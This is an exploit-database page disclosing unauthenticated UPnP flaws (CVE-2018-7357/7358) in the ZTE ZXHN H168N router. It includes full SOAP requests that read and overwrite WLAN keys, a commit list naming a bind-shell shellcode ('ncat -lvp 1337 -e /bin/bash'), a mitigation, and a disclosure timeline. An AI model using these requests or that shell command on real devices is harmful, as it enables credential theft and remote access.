a07949d1c7
21 changes to exploits/shellcodes SmartFTP Client 9.0.2623.0 - Denial of Service (PoC) LanSpy 2.0.1.159 - Local Buffer Overflow (PoC) XNU - POSIX Shared Memory Mappings have Incorrect Maximum Protection McAfee True Key - McAfee.TrueKey.Service Privilege Escalation DomainMOD 4.11.01 - Cross-Site Scripting DomainMOD 4.11.01 - 'raid' Cross-Site Scripting Tourism Website Blog - Remote Code Execution / SQL Injection Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery PrestaShop 1.6.x/1.7.x - Remote Code Execution DomainMOD 4.11.01 - Cross-Site Scripting PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion TP-Link wireless router Archer C1200 - Cross-Site Scripting Huawei B315s-22 - Information Leak ZTE ZXHN H168N - Improper Access Restrictions Sitecore CMS 8.2 - Cross-Site Scripting / Arbitrary File Disclosure IceWarp Mail Server 11.0.0.0 - Cross-Site Scripting Apache OFBiz 16.11.05 - Cross-Site Scripting HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection ThinkPHP 5.0.23/5.1.31 - Remote Code Execution Adobe ColdFusion 2018 - Arbitrary File Upload Linux/x86 - execve(/usr/bin/ncat -lvp 1337 -e /bin/bash)+Null-Free Shellcode (95 bytes)
59 lines
No EOL
2.5 KiB
Text
59 lines
No EOL
2.5 KiB
Text
[*] POC: (CVE-2018-7357 and CVE-2018-7358)
|
||
|
||
Disclaimer: [This POC is for Educational Purposes , I would Not be
|
||
responsible for any misuse of the information mentioned in this blog post]
|
||
|
||
[+] Unauthenticated
|
||
|
||
[+] Author: Usman Saeed (usman [at] xc0re.net)
|
||
|
||
[+] Protocol: UPnP
|
||
|
||
[+] Affected Harware/Software:
|
||
|
||
Model name: ZXHN H168N v2.2
|
||
Build Timestamp: 20171127193202
|
||
Software Version: V2.2.0_PK1.2T5
|
||
[+] Findings:
|
||
|
||
1. Unauthenticated access to WLAN password:
|
||
|
||
POST /control/igd/wlanc_1_1 HTTP/1.1
|
||
Host: <IP>:52869
|
||
User-Agent: {omitted}
|
||
Content-Length: 288
|
||
Connection: close
|
||
Content-Type: text/xml; charset=”utf-8″
|
||
SOAPACTION: “urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys” 1
|
||
<?xml version=”1.0″ encoding=”utf-8″?>
|
||
<s:Envelope xmlns:s=”http://schemas.xmlsoap.org/soap/envelope/” s:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”><s:Body><u:GetSecurityKeys xmlns:u=”urn:dslforum-org:service:WLANConfiguration:1″></u:GetSecurityKeys></s:Body></s:Envelope>
|
||
|
||
2. Unauthenticated WLAN passphrase change:
|
||
|
||
POST /control/igd/wlanc_1_1 HTTP/1.1
|
||
Host: <IP>:52869
|
||
User-Agent: {omitted}
|
||
Content-Length: 496
|
||
Connection: close
|
||
Content-Type: text/xml; charset=”utf-8″
|
||
SOAPACTION: “urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys”
|
||
<?xml version=”1.0″ encoding=”utf-8″?>
|
||
<s:Envelope xmlns:s=”http://schemas.xmlsoap.org/soap/envelope/” s:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”><s:Body><u:SetSecurityKeys xmlns:u=”urn:dslforum-org:service:WLANConfiguration:1″><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>
|
||
[*] Solution:
|
||
|
||
UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.
|
||
|
||
[*] Note:
|
||
|
||
There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.
|
||
|
||
[+] Responsible Disclosure:
|
||
|
||
Vulnerabilities identified – 20 August, 2018
|
||
Reported to ZTE – 28 August, 2018
|
||
ZTE official statement – 17 September 2018
|
||
ZTE patched the vulnerability – 12 November 2018
|
||
The operator pushed the update – 12 November 2018
|
||
CVE published – Later
|
||
Public disclosure – 12 November 2018
|
||
Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522 |